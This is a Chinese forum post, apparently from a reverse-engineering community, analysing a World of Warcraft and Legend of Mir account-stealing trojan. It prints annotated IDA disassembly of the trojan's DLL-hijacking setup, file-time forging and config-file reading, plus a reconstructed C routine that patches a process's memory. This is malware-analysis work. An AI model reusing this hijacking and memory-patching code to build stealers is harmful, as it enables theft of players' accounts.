今天小红伞居然拦截了ie,看了看原因,,呵呵,,中马了,这年头。。。。。
没事权当玩玩,抓了木马样本(usp10.dll),pediy查壳,居然这么客气,没加壳,od载入,呵呵,弹出对话框找不到文件,什么原因呢,哦原来usp10.dll
改名为lpk.dll,无奈,无语,自己重命了名,呵呵,od再次载入,这次就没问题了。先描述下这个木马吧,大小156k,隐藏,注入iexplorer,setncc.exe,
wow.exe(查了下,原来是魔兽世界网络进程,看来是魔兽热血传奇盗号木马)。ida打开木马样本,个人比较喜欢从整体去看一个东西,所以先把dllmain整个扫了一遍。
push offset aLpkeditcontrol ; "LpkEditControl"
.text:10001BEA call GetProcessAddress ;该函数主要加载系统目录下lpk.DLL
.text:10001BEF add eax, 4
.text:10001BF2 push eax ; Src
.text:10001BF3 push offset unk_10020054 ; Dst
.text:10001BF8 call _memcpy ; memcpy(LpkEditControl+1, (int*)GetAddress("LpkEditControl") + 1,55);
.text:10001BF8 ;
.text:10001BFD add esp, 0Ch
.text:10001C00 mov SystemTime.wYear, 7D4h ; 2004年8月15日
.text:10001C09 mov SystemTime.wMonth, 8
.text:10001C12 mov SystemTime.wDay, 0Fh
.text:10001C1B push offset FileTime ; lpFileTime
.text:10001C20 push offset SystemTime ; lpSystemTime
.text:10001C25 mov SystemTime.wHour, 1
.text:10001C2E mov SystemTime.wMinute, bx
.text:10001C35 mov SystemTime.wSecond, bx
.text:10001C3C mov SystemTime.wDayOfWeek, bx
.text:10001C43 mov SystemTime.wMilliseconds, bx
.text:10001C4A call ds:SystemTimeToFileTime ; 指定创建与修改文件时间2004.8.15
.text:10001C50 mov edi, 104h
.text:10001C55 mov esi, offset Filename
.text:10001C5A push edi ; Size
.text:10001C5B push ebx ; Val
.text:10001C5C push esi ; Dst
.text:10001C5D call _memset ; memset(filename,0,260)
.text:10001C62 push edi ; Size
.text:10001C63 mov ebp, offset OldFilename
.text:10001C68 push ebx ; Val
.text:10001C69 push ebp ; Dst
.text:10001C6A call _memset ; memset(oldfilename,0,260)
.text:10001C6F add esp, 18h
.text:10001C72 push edi ; nSize
.text:10001C73 push esi ; lpFilename
.text:10001C74 push ebx ; hModule
.text:10001C75 call ds:GetModuleFileNameA ; GetModuleFileName(NULL,Filename,260)
.text:10001C75 ; If hmodule is NULL, GetModuleFileName returns the path for the file used to create
the calling process.
.text:10001C75 ;
.text:10001C75 ;
.text:10001C75 ;
.text:10001C7B push esi ; String --- filename
.text:10001C7C call __strlwr ; 将字符串s转换为小写形式
.text:10001C81 pop ecx
.text:10001C82 call ds:GetTickCount
.text:10001C88 test al, 1 ; 主要该函数实现dll文件名在指定时刻改名
.text:10001C8A mov ebx, offset aLpk_dll ; "Lpk.dll"
.text:10001C8F jnz short loc_10001CA1
.text:10001C91 push ebx ; Source
.text:10001C92 push ebp ; Dest
.text:10001C93 call _strcpy ; strcpy(oldfilename,"lpk.dll")
.text:10001C98 pop ecx
.text:10001C99 mov edi, offset FileName ; "Usp10.dll"
.text:10001C9E pop ecx
.text:10001C9F jmp short loc_10001CAF
.text:10001CA1 ; ---------------------------------------------------------------------------
.text:10001CA1
.text:10001CA1 loc_10001CA1: ; CODE XREF: DllMain(x,x,x)+D8j
.text:10001CA1 mov edi, offset FileName ; "Usp10.dll"
.text:10001CA6 push edi ; Source
.text:10001CA7 push ebp ; Dest
.text:10001CA8 call _strcpy ; strcpy(filename,"usp10.dll")
.text:10001CAD pop ecx
.text:10001CAE pop ecx
.text:10001CAF
.text:10001CAF loc_10001CAF: ; CODE XREF: DllMain(x,x,x)+E8j
.text:10001CAF mov esi, ds:GetFileAttributesA
.text:10001CB5 push edi ; lpFileName
.text:10001CB6 call esi ; GetFileAttributesA
.text:10001CB8 cmp eax, 0FFFFFFFFh ; 0xFFFFFFFF indicates failure
.text:10001CBB jnz short loc_10001CC1
.text:10001CBD push ebp
.text:10001CBE push ebx
.text:10001CBF jmp short loc_10001D04
.text:10001CC1 ; ---------------------------------------------------------------------------
.text:10001CC1
.text:10001CC1 loc_10001CC1: ; CODE XREF: DllMain(x,x,x)+104j
.text:10001CC1 push ebx ; lpFileName
.text:10001CC2 call esi ; GetFileAttributesA
.text:10001CC4 cmp eax, 0FFFFFFFFh
.text:10001CC7 jnz short loc_10001CCD
.text:10001CC9 push ebp
.text:10001CCA push edi
.text:10001CCB jmp short loc_10001D04
.text:10001CCD ; ---------------------------------------------------------------------------
.text:10001CCD
.text:10001CCD loc_10001CCD: ; CODE XREF: DllMain(x,x,x)+110j
.text:10001CCD mov edi, offset aThumbss_db ; "Thumbss.db"
.text:10001CD2 push edi ; Filename
.text:10001CD3 call _remove
.text:10001CD8 mov ebp, offset aThumbs_db ; "Thumbs.db"
.text:10001CDD push ebp ; Filename
.text:10001CDE call _remove ; 删除指定Thumbs.db文件
.text:10001CE3 pop ecx
.text:10001CE4 pop ecx
.text:10001CE5 push edi ; lpFileName
.text:10001CE6 call esi ; GetFileAttributesA
.text:10001CE8 cmp eax, 0FFFFFFFFh
.text:10001CEB jnz short loc_10001CF6
.text:10001CED push edi ; NewFilename
.text:10001CEE push ebx ; OldFilename
.text:10001CEF call _rename
.text:10001CF4 pop ecx
.text:10001CF5 pop ecx
.text:10001CF6
.text:10001CF6 loc_10001CF6: ; CODE XREF: DllMain(x,x,x)+134j
.text:10001CF6 push ebp ; lpFileName
.text:10001CF7 call esi ; GetFileAttributesA
.text:10001CF9 cmp eax, 0FFFFFFFFh
.text:10001CFC jnz short loc_10001D0B
.text:10001CFE push ebp ; NewFilename
.text:10001CFF push offset FileName ; "Usp10.dll"
.text:10001D04
.text:10001D04 loc_10001D04: ; CODE XREF: DllMain(x,x,x)+108j
.text:10001D04 ; DllMain(x,x,x)+114j
.text:10001D04 call _rename
.text:10001D09 pop ecx
.text:10001D0A pop ecx
.text:10001D0B
.text:10001D0B loc_10001D0B: ; CODE XREF: DllMain(x,x,x)+145j
.text:10001D0B xor eax, eax
.text:10001D0D push eax ; lpThreadId
.text:10001D0E push eax ; dwCreationFlags
.text:10001D0F push eax ; lpParameter
.text:10001D10 push offset StartAddress ; lpStartAddress
.text:10001D15 push eax ; dwStackSize
.text:10001D16 push eax ; lpThreadAttributes
.text:10001D17 call ds:CreateThread
.text:10001D1D push eax ; hObject
.text:10001D1E call ds:CloseHandle
.text:10001D24 pop ebp
.text:10001D25 jmp loc_10001DDE
.text:10001D2A ; ---------------------------------------------------------------------------
.text:10001D2A
.text:10001D2A loc_10001D2A: ; CODE XREF: DllMain(x,x,x)+11j
.text:10001D2A mov esi, offset Filename
.text:10001D2F push offset aSethcc_exe ; "sethcc.exe"
.text:10001D34 push esi ; Str
.text:10001D35 call _strstr
.text:10001D3A mov edi, ds:WinExec
.text:10001D40 pop ecx
.text:10001D41 test eax, eax
.text:10001D43 pop ecx
.text:10001D44 jz short loc_10001D58
.text:10001D46 cmp dword_10028448, 0Bh
.text:10001D4D jz short loc_10001D58
.text:10001D4F push 1 ; uCmdShow The directory from which the application loaded
.text:10001D51 push offset CmdLine ; "sethcc.exe 211"
.text:10001D56 call edi ; WinExec ; 运行指定程序
.text:10001D58
.text:10001D58 loc_10001D58: ; CODE XREF: DllMain(x,x,x)+18Dj
.text:10001D58 ; DllMain(x,x,x)+196j
.text:10001D58 push offset aMir ; "mir"
.text:10001D5D push esi ; Str
.text:10001D5E call _strstr
.text:10001D63 pop ecx
.text:10001D64 test eax, eax
.text:10001D66 pop ecx
.text:10001D67 jz short loc_10001DC0
.text:10001D69 push offset a_dat ; ".dat"
.text:10001D6E push esi ; Str
.text:10001D6F call _strstr
.text:10001D74 pop ecx
.text:10001D75 test eax, eax
.text:10001D77 pop ecx
.text:10001D78 jz short loc_10001DC0
.text:10001D7A mov esi, offset byte_10026A54
.text:10001D7F push esi ; Str
.text:10001D80 call _strlen
.text:10001D85 cmp eax, 3
.text:10001D88 pop ecx
.text:10001D89 jbe short loc_10001DC0
.text:10001D8B cmp dword_1002845C, 63h
.text:10001D92 jnz short loc_10001DC0
.text:10001D94 push 0C00h ; Size
.text:10001D99 lea eax, [esp+0C10h+Dst]
.text:10001D9D push ebx ; Val
.text:10001D9E push eax ; Dst
.text:10001D9F call _memset
.text:10001DA4 push esi
.text:10001DA5 lea eax, [esp+0C1Ch+Dst]
.text:10001DA9 push offset aSIexplore_exeH ; "\"%s\\iexplore.exe\" http://ekey.sdo.com/e"...
.text:10001DAE push eax ; Dest
.text:10001DAF call _sprintf
.text:10001DB4 add esp, 18h
.text:10001DB7 lea eax, [esp+0C0Ch+Dst]
.text:10001DBB push 1 ; uCmdShow
.text:10001DBD push eax ; lpCmdLine
.text:10001DBE call edi ; WinExec ; 用ie打开盛大密保网页
.text:10001DC0
.text:10001DC0 loc_10001DC0: ; CODE XREF: DllMain(x,x,x)+1B0j
.text:10001DC0 ; DllMain(x,x,x)+1C1j ...
.text:10001DC0 mov eax, hLibModule
.text:10001DC5 mov esi, ds:FreeLibrary
.text:10001DCB cmp eax, ebx
.text:10001DCD jz short loc_10001DD2
.text:10001DCF push eax ; hLibModule
.text:10001DD0 call esi ; FreeLibrary
.text:10001DD2
.text:10001DD2 loc_10001DD2: ; CODE XREF: DllMain(x,x,x)+216j
.text:10001DD2 mov eax, dword_10028430
.text:10001DD7 cmp eax, ebx
.text:10001DD9 jz short loc_10001DDE
.text:10001DDB push eax ; hLibModule
.text:10001DDC call esi ; FreeLibrary
.text:10001DDE
.text:10001DDE loc_10001DDE: ; CODE XREF: DllMain(x,x,x)+18j
.text:10001DDE ; DllMain(x,x,x)+16Ej ...
.text:10001DDE push 1
.text:10001DE0 pop eax
.text:10001DE1 pop edi
.text:10001DE2 pop esi
.text:10001DE3 pop ebx
.text:10001DE4 add esp, 0C00h
.text:10001DEA retn 0Ch
百度"LpkEditControl"字符串,居然发现了一个信息,,呵呵,,原来该病毒是看雪上一个老兄写的。。。。。。。LpkEditControl是一个数组,里面存放了一
些函数,呵呵,我想这个老兄当初写这个病毒的时候一定在看《加密与解密第三版》,下面的这段反汇编代码我相信大家一定会很熟悉的。。。。。
.text:10001DED push ebp ; 构造lpk.dll,并将补丁代码内置
.text:10001DEE mov ebp, esp
.text:10001DF0 sub esp, 7Ch
.text:10001DF3 push ebx
.text:10001DF4 push esi
.text:10001DF5 lea eax, [ebp+flOldProtect]
.text:10001DF8 mov esi, ds:VirtualProtectEx
.text:10001DFE push edi
.text:10001DFF push eax ; lpflOldProtect
.text:10001E00 push 40h ; flNewProtect
.text:10001E02 mov edi, 401496h
.text:10001E07 push 2 ; dwSize
.text:10001E09 push edi ; lpAddress
.text:10001E0A push [ebp+hProcess] ; hProcess
.text:10001E0D mov [ebp+Buffer], 0EBh ; unsigned char p401496[2] = {0xEB, 0x29};
.text:10001E11 mov [ebp+var_1], 29h
.text:10001E15 call esi ; VirtualProtectEx ; 修改可读写属性VirtualProtectEx(hProcess, (LPVOID)0x401496, 2,
PAGE_EXECUTE_READWRITE, &Oldpp);
.text:10001E17 xor ebx, ebx
.text:10001E19 lea eax, [ebp+Buffer]
.text:10001E1C push ebx ; lpNumberOfBytesWritten
.text:10001E1D push 2 ; nSize
.text:10001E1F push eax ; lpBuffer
.text:10001E20 push edi ; lpBaseAddress
.text:10001E21 push [ebp+hProcess] ; hProcess
.text:10001E24 mov edi, ds:WriteProcessMemory
.text:10001E2A call edi ; WriteProcessMemory ; 向指定内存写数据WriteProcessMemory(hProcess, (LPVOID)0x401496, p401496, 2,
NULL);
.text:10001E2C lea eax, [ebp+flOldProtect]
.text:10001E2F mov [ebp+var_10], 0E8h
.text:10001E33 push eax ; lpflOldProtect
.text:10001E34 push 40h ; flNewProtect
.text:10001E36 push 5 ; dwSize
.text:10001E38 push 40163h ; lpAddress
.text:10001E3D push [ebp+hProcess] ; hProcess
.text:10001E40 mov [ebp+var_F], 67h
.text:10001E44 mov [ebp+var_E], 0E4h
.text:10001E48 mov [ebp+var_D], bl
.text:10001E4B mov [ebp+var_C], bl ; unsigned char p40163C[5] = {0xE8, 0x67, 0xE4, 0x00, 0x00};
.text:10001E4E call esi ; VirtualProtectEx ; VirtualProtectEx(hProcess, (LPVOID)0x40163, 5, PAGE_EXECUTE_READWRITE,
&Oldpp);
.text:10001E4E ;
.text:10001E50 push ebx ; lpNumberOfBytesWritten
.text:10001E51 lea eax, [ebp+var_10]
.text:10001E54 push 5 ; nSize
.text:10001E56 push eax ; lpBuffer
.text:10001E57 push 40163Ch ; lpBaseAddress
.text:10001E5C push [ebp+hProcess] ; hProcess
.text:10001E5F call edi ; WriteProcessMemory ; WriteProcessMemory(hProcess, (LPVOID)0x40163C, p40163C, 5, NULL);
.text:10001E61 lea eax, [ebp+flOldProtect]
.text:10001E64 mov [ebp+var_4], 0EBh ; unsigned char p401655[2] = {0xEB, 0x67};
.text:10001E68 push eax ; lpflOldProtect
.text:10001E69 push 40h ; flNewProtect
.text:10001E6B push 2 ; dwSize
.text:10001E6D push 401655h ; lpAddress
.text:10001E72 push [ebp+hProcess] ; hProcess
.text:10001E75 mov [ebp+var_3], 67h
.text:10001E79 call esi ; VirtualProtectEx ; VirtualProtectEx(hProcess, (LPVOID)0x401655, 2, PAGE_EXECUTE_READWRITE,
&Oldpp);
.text:10001E7B push ebx ; lpNumberOfBytesWritten
.text:10001E7C lea eax, [ebp+var_4]
.text:10001E7F push 2 ; nSize
.text:10001E81 push eax ; lpBuffer
.text:10001E82 push 401655h ; lpBaseAddress
.text:10001E87 push [ebp+hProcess] ; hProcess
.text:10001E8A call edi ; WriteProcessMemory ; WriteProcessMemory(hProcess, (LPVOID)0x401655, p401655, 2, NULL);
.text:10001E8C lea eax, [ebp+flOldProtect]
.text:10001E8F or [ebp+var_1B], 0FFh
.text:10001E93 or [ebp+var_1A], 0FFh
.text:10001E97 push eax ; lpflOldProtect
.text:10001E98 push 40h ; flNewProtect
.text:10001E9A push 10h ; dwSize
.text:10001E9C push 40FAA8h ; lpAddress
.text:10001EA1 mov [ebp+var_20], 50h
.text:10001EA5 push [ebp+hProcess] ; hProcess
.text:10001EA8 mov [ebp+var_1F], 8Ah
.text:10001EAC mov [ebp+var_1E], 85h
.text:10001EB0 mov [ebp+var_1D], 0ACh
.text:10001EB4 mov [ebp+var_1C], 0FDh
.text:10001EB8 mov [ebp+var_19], 0A2h
.text:10001EBC mov [ebp+var_18], 76h
.text:10001EC0 mov [ebp+var_17], 0AEh
.text:10001EC4 mov [ebp+var_16], 41h
.text:10001EC8 mov [ebp+var_15], bl
.text:10001ECB mov [ebp+var_14], 58h
.text:10001ECF mov [ebp+var_13], 0C2h
.text:10001ED3 mov [ebp+var_12], 10h
.text:10001ED7 mov [ebp+var_11], bl
.text:10001EDA call esi ; VirtualProtectEx
.text:10001EDC push ebx ; lpNumberOfBytesWritten
.text:10001EDD lea eax, [ebp+var_20]
.text:10001EE0 push 10h ; nSize
.text:10001EE2 push eax ; lpBuffer
.text:10001EE3 push 40FAA8h ; lpBaseAddress
.text:10001EE8 push [ebp+hProcess] ; hProcess
.text:10001EEB call edi ; WriteProcessMemory ; unsigned char p40FAA8[16] = {0x50, 0x8A, 0x85, 0xAC, 0xFD, 0xFF, 0xFF,
0xA2, 0x76, 0xAE, 0x41, 0x00, 0x58, 0xC2, 0x10, 0x00};
.text:10001EEB ; VirtualProtectEx(hProcess, (LPVOID)0x40FAA8, 16, PAGE_EXECUTE_READWRITE, &Oldpp);
.text:10001EEB ; WriteProcessMemory(hProcess, (LPVOID)0x40FAA8, p40FAA8, 16, NULL);
.text:10001EED or [ebp+var_3B], 0FFh
.text:10001EF1 mov [ebp+var_7C], 14h
.text:10001EF5 mov [ebp+var_7B], 15h
.text:10001EF9 mov [ebp+var_7A], bl
.text:10001EFC mov [ebp+var_79], bl
.text:10001EFF mov [ebp+var_78], 0D5h
.text:10001F03 mov [ebp+var_77], 7
.text:10001F07 mov [ebp+var_76], 9
.text:10001F0B mov [ebp+var_75], bl
.text:10001F0E mov [ebp+var_74], 1
.text:10001F12 mov [ebp+var_73], bl
.text:10001F15 mov [ebp+var_72], 13h
.text:10001F19 mov [ebp+var_71], bl
.text:10001F1C mov [ebp+var_70], 3
.text:10001F20 mov [ebp+var_6F], bl
.text:10001F23 mov [ebp+var_6E], 6Dh
.text:10001F27 mov [ebp+var_6D], bl
.text:10001F2A mov [ebp+var_6C], 11h
.text:10001F2E mov [ebp+var_6B], bl
.text:10001F31 mov [ebp+var_6A], 0BBh
.text:10001F35 mov [ebp+var_69], bl
.text:10001F38 mov [ebp+var_68], 91h
.text:10001F3C mov [ebp+var_67], 53h
.text:10001F40 mov [ebp+var_66], 1
.text:10001F44 mov [ebp+var_65], bl
.text:10001F47 mov [ebp+var_64], 21h
.text:10001F4B mov [ebp+var_63], 61h
.text:10001F4F mov [ebp+var_62], bl
.text:10001F52 mov [ebp+var_61], bl
.text:10001F55 mov [ebp+var_60], 1Eh
.text:10001F59 mov [ebp+var_5F], bl
.text:10001F5C mov [ebp+var_5E], 0C5h
.text:10001F60 mov [ebp+var_5D], 0Bh
.text:10001F64 mov [ebp+var_5C], 0C9h
.text:10001F68 mov [ebp+var_5B], 0Bh
.text:10001F6C mov [ebp+var_5A], 30h
.text:10001F70 mov [ebp+var_59], 0BDh
.text:10001F74 mov [ebp+var_58], 97h
.text:10001F78 mov [ebp+var_57], 88h
.text:10001F7C mov [ebp+var_56], 8Eh
.text:10001F80 mov [ebp+var_55], bl
.text:10001F83 mov [ebp+var_54], 0BEh
.text:10001F87 mov [ebp+var_53], 19h
.text:10001F8B mov [ebp+var_52], bl
.text:10001F8E mov [ebp+var_51], bl
.text:10001F91 mov [ebp+var_50], 0D4h
.text:10001F95 mov [ebp+var_4F], 12h
.text:10001F99 mov [ebp+var_4E], bl
.text:10001F9C mov [ebp+var_4D], bl ; unsigned char p41AE68[90] =
.text:10001F9C ; {
.text:10001F9C ; 0x14, 0x15, 0x00, 0x00, 0xD5, 0x07, 0x09, 0x00, 0x01, 0x00, 0x13,
0x00, 0x03, 0x00, 0x6D, 0x00,
.text:10001F9C ; 0x11, 0x00, 0xBB, 0x00, 0x91, 0x53, 0x01, 0x00, 0x21, 0x61, 0x00,
0x00, 0x1E, 0x00, 0xC5, 0x0B,
.text:10001F9C ; 0xC9, 0x0B, 0x30, 0xBD, 0x97, 0x88, 0x8E, 0x00, 0xBE, 0x19, 0x00,
0x00, 0xD4, 0x12, 0x00, 0x00,
.text:10001F9C ; 0x6F, 0x35, 0xE1, 0x52, 0x51, 0xA4, 0xB7, 0x07, 0x76, 0xE7, 0xD4,
0xA1, 0x43, 0x98, 0x88, 0xD6,
.text:10001F9C ; 0x45, 0xFF, 0xC6, 0xB1, 0x43, 0x66, 0x77, 0x98, 0x77, 0x67, 0x54,
0x66, 0x77, 0x53, 0x64, 0x58,
.text:10001F9C ; 0x6C, 0x66, 0x05, 0x08, 0x60, 0x16, 0x30, 0xB4, 0xAA, 0x54
.text:10001F9C ; } ;
.text:10001F9C ; VirtualProtectEx(hProcess, (LPVOID)0x41AE68, 90, PAGE_EXECUTE_READWRITE,
&Oldpp);
.text:10001F9C ; WriteProcessMemory(hProcess, (LPVOID)0x41AE68, p41AE68, 90, NULL);
.text:10001F9C ; }
.text:10001F9F mov [ebp+var_4C], 6Fh
.text:10001FA3 mov [ebp+var_4B], 35h
.text:10001FA7 mov [ebp+var_4A], 0E1h
.text:10001FAB mov [ebp+var_49], 52h
.text:10001FAF mov [ebp+var_48], 51h
.text:10001FB3 mov [ebp+var_47], 0A4h
.text:10001FB7 mov [ebp+var_46], 0B7h
.text:10001FBB mov [ebp+var_45], 7
.text:10001FBF mov [ebp+var_44], 76h
.text:10001FC3 mov [ebp+var_43], 0E7h
.text:10001FC7 mov [ebp+var_42], 0D4h
.text:10001FCB mov [ebp+var_41], 0A1h
.text:10001FCF mov [ebp+var_40], 43h
.text:10001FD3 mov [ebp+var_3F], 98h
.text:10001FD7 mov [ebp+var_3E], 88h
.text:10001FDB mov [ebp+var_3D], 0D6h
.text:10001FDF mov [ebp+var_3C], 45h
.text:10001FE3 mov [ebp+var_3A], 0C6h
.text:10001FE7 mov [ebp+var_39], 0B1h
.text:10001FEB mov [ebp+var_38], 43h
.text:10001FEF mov [ebp+var_37], 66h
.text:10001FF3 mov [ebp+var_36], 77h
.text:10001FF7 mov [ebp+var_35], 98h
.text:10001FFB mov [ebp+var_34], 77h
.text:10001FFF mov [ebp+var_33], 67h
.text:10002003 lea eax, [ebp+flOldProtect]
.text:10002006 mov [ebp+var_32], 54h
.text:1000200A push eax ; lpflOldProtect
.text:1000200B push 40h ; flNewProtect
.text:1000200D push 5Ah ; dwSize
.text:1000200F push 41AE68h ; lpAddress
.text:10002014 push [ebp+hProcess] ; hProcess
.text:10002017 mov [ebp+var_31], 66h
.text:1000201B mov [ebp+var_30], 77h
.text:1000201F mov [ebp+var_2F], 53h
.text:10002023 mov [ebp+var_2E], 64h
.text:10002027 mov [ebp+var_2D], 58h
.text:1000202B mov [ebp+var_2C], 6Ch
.text:1000202F mov [ebp+var_2B], 66h
.text:10002033 mov [ebp+var_2A], 5
.text:10002037 mov [ebp+var_29], 8
.text:1000203B mov [ebp+var_28], 60h
.text:1000203F mov [ebp+var_27], 16h
.text:10002043 mov [ebp+var_26], 30h
.text:10002047 mov [ebp+var_25], 0B4h
.text:1000204B mov [ebp+var_24], 0AAh
.text:1000204F mov [ebp+var_23], 54h
.text:10002053 call esi ; VirtualProtectEx
.text:10002055 push ebx ; lpNumberOfBytesWritten
.text:10002056 lea eax, [ebp+var_7C]
.text:10002059 push 5Ah ; nSize
.text:1000205B push eax ; lpBuffer
.text:1000205C push 41AE68h ; lpBaseAddress
.text:10002061 push [ebp+hProcess] ; hProcess
.text:10002064 call edi ; WriteProcessMemory
.text:10002066 pop edi
.text:10002067 pop esi
.text:10002068 pop ebx
.text:10002069 leave
.text:1000206A retn
.text:1000206A PatchProcess endp
上面的代码主要采用了dll劫持技术,该木马利用当前程序会首先加载所在目录dll的特点而在当前目录下创建lpk.dll并构造了十几个输出函数(太多了,不列出来了),其实作者什么东西都没有改,,代码是加密解密里面的。。。。。。下面是c语言代码。。。。。
void PatchProcess(HANDLE hProcess)
{
DWORD Oldpp;
unsigned char p401496[2] = {
0xEB, 0x29
};
VirtualProtectEx(hProcess, (LPVOID)0x401496, 2, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x401496, p401496, 2, NULL);
unsigned char p40163C[5] = {
0xE8, 0x67, 0xE4, 0x00, 0x00
};
VirtualProtectEx(hProcess, (LPVOID)0x40163, 5, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x40163C, p40163C, 5, NULL);
unsigned char p401655[2] = {
0xEB, 0x67
};
VirtualProtectEx(hProcess, (LPVOID)0x401655, 2, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x401655, p401655, 2, NULL);
unsigned char p40FAA8[16] = {
0x50, 0x8A, 0x85, 0xAC, 0xFD, 0xFF, 0xFF, 0xA2, 0x76, 0xAE, 0x41, 0x00, 0x58, 0xC2, 0x10, 0x00
};
VirtualProtectEx(hProcess, (LPVOID)0x40FAA8, 16, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x40FAA8, p40FAA8, 16, NULL);
unsigned char p41AE68[90] =
{
0x14, 0x15, 0x00, 0x00, 0xD5, 0x07, 0x09, 0x00, 0x01, 0x00, 0x13, 0x00, 0x03, 0x00, 0x6D, 0x00,
0x11, 0x00, 0xBB, 0x00, 0x91, 0x53, 0x01, 0x00, 0x21, 0x61, 0x00, 0x00, 0x1E, 0x00, 0xC5, 0x0B,
0xC9, 0x0B, 0x30, 0xBD, 0x97, 0x88, 0x8E, 0x00, 0xBE, 0x19, 0x00, 0x00, 0xD4, 0x12, 0x00, 0x00,
0x6F, 0x35, 0xE1, 0x52, 0x51, 0xA4, 0xB7, 0x07, 0x76, 0xE7, 0xD4, 0xA1, 0x43, 0x98, 0x88, 0xD6,
0x45, 0xFF, 0xC6, 0xB1, 0x43, 0x66, 0x77, 0x98, 0x77, 0x67, 0x54, 0x66, 0x77, 0x53, 0x64, 0x58,
0x6C, 0x66, 0x05, 0x08, 0x60, 0x16, 0x30, 0xB4, 0xAA, 0x54
} ;
VirtualProtectEx(hProcess, (LPVOID)0x41AE68, 90, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x41AE68, p41AE68, 90, NULL);
}
获得魔兽的相关信息主要是开启一线程读取魔兽安装目录下config.wtf视频配置文件,
StartthreadAddress proc near ; DATA XREF: sub_10007CEE+D2o
.text:100021AC
.text:100021AC DstBuf = byte ptr -0C00h
.text:100021AC
.text:100021AC push ebp
.text:100021AD mov ebp, esp
.text:100021AF sub esp, 0C00h
.text:100021B5 push esi
.text:100021B6 push offset Mode ; "rb"
.text:100021BB push offset aWtfConfig_wtf ; "WTF\\Config.wtf"
.text:100021C0 call _fopen
.text:100021C5 mov esi, eax
.text:100021C7 pop ecx
.text:100021C8 test esi, esi
.text:100021CA pop ecx
.text:100021CB jz loc_10002264
.text:100021D1 push esi ; File
.text:100021D2 push 1 ; Count
.text:100021D4 lea eax, [ebp+DstBuf]
.text:100021DA push 0C00h ; ElementSize
.text:100021DF push eax ; DstBuf 存放读取文件信息
.text:100021E0 call ReadFilefun
.text:100021E5 push esi ; File
.text:100021E6 call _fclose
.text:100021EB lea eax, [ebp+DstBuf]
.text:100021F1 push offset aWarcraftchina_ ; "warcraftchina.com"
.text:100021F6 push eax ; Str
.text:100021F7 call _strstr ; 查找是否存在魔兽新官方网站
.text:100021FC add esp, 1Ch
.text:100021FF test eax, eax
.text:10002201 jz short loc_10002264
.text:10002203 lea eax, [ebp+DstBuf]
.text:10002209 push offset aRealmname ; "realmName"
.text:1000220E push eax ; Str 魔兽服务器
.text:1000220F call _strstr
.text:10002214 add eax, 0Bh ; 绕过 realmname等字节直接存取服务器
.text:10002217 push 8Ch ; Count
.text:1000221C mov esi, offset realmNamewh
.text:10002221 push eax ; Source
.text:10002222 push esi ; Dest
.text:10002223 call _strncpy
.text:10002228 push 22h ; Val
.text:1000222A push esi ; Str
.text:1000222B call _strchr
.text:10002230 add esp, 1Ch
.text:10002233 test eax, eax
.text:10002235 jz short loc_10002264
.text:10002237 push 22h ; Val
.text:10002239 push esi ; Str
.text:1000223A call _strchr
.text:1000223F and byte ptr [eax], 0
.text:10002242 push esi ; lpMultiByteStr
.text:10002243 call sub_1001A590
.text:10002248 push offset aWow ; "wow"
.text:1000224D push esi
.text:1000224E call getsthbywtf
.text:10002253 add esp, 14h
.text:10002256 test eax, eax
.text:10002258 jz short loc_10002264
.text:1000225A mov dword_1002843C, 1
.text:10002264
.text:10002264 loc_10002264: ; CODE XREF: StartthreadAddress+1Fj
.text:10002264 ; StartthreadAddress+55j ...
.text:10002264 pop esi
.text:10002265 leave
.text:10002266 retn
由于该病毒较大,所以暂时看了一些比较感兴趣的东西,以后有空再补上该木马下载盗号等等的一些相关信息。。。。。。。
my blog:http://hi.baidu.com/hljleo
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
